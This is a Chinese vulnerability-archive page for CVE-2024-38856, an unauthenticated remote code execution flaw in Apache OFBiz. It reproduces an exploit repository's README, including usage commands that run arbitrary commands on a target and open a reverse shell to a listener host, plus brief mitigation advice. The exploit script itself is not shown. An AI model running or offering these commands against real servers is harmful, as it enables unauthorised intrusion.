关联漏洞
标题:
Apache OFBiz 安全漏洞
(CVE-2024-38856)
描述:Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 18.12.14及之前版本存在安全漏洞,该漏洞源于存在授权错误漏洞,从而导致未经身份验证的端点可执行屏幕渲染代码。
描述
Exploit for Apache OFBiz - CVE-2024-38856
介绍
# Apache-OFBiz-Exploit
Exploit for Apache OFBiz (CVE-2024-38856)
By: **Alisson Faoli**
## Description
This repository contains an exploit for the CVE-2024-38856 vulnerability found in Apache OFBiz. The flaw allows Unauthenticated RCE (Remote Code Execution).
Note: This exploit is provided for educational and research purposes only. Misuse may be illegal and is the sole responsibility of the user.
## Vulnerability Details
CVE: **CVE-2024-38856**
Affected Software: Apache OFBiz up to version 18.12.14
Vulnerability Type: RCE
Exploitation: Authentication not required
## References:
- https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
- https://www.cyfirma.com/research/cve-2024-38856-pre-authentication-remote-code-execution-rce-vulnerability-analysis-and-exploitation/
## Usage
Clone the repository:
```
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
```
Install the dependencies:
```
pip install -r requirements.txt
```
Run the exploit:
**RCE**:
```python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"```
**SHELL**:
```python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444```
## Mitigation
To remediate this vulnerability, it is recommended that Apache OFBiz administrators:
Update to the patched version available at [link to fix].
Apply firewall or WAF rules to block known exploitation attempts.
## Contact
If you have any questions or want to report an improvement to the exploit, contact me:
LinkedIn: https://linkedin.com/in/alisson-faoli/
#
#### Legal Disclaimer:
This code is provided solely for educational purposes and security testing in authorized environments. The author is not responsible for any misuse.
文件快照
[4.0K] /data/pocs/ba8fd285fa2b96e89df17924cc326e54f57eb227
├── [3.0K] CVE-2024-38856.py
├── [6.9K] LICENSE
├── [1.8K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。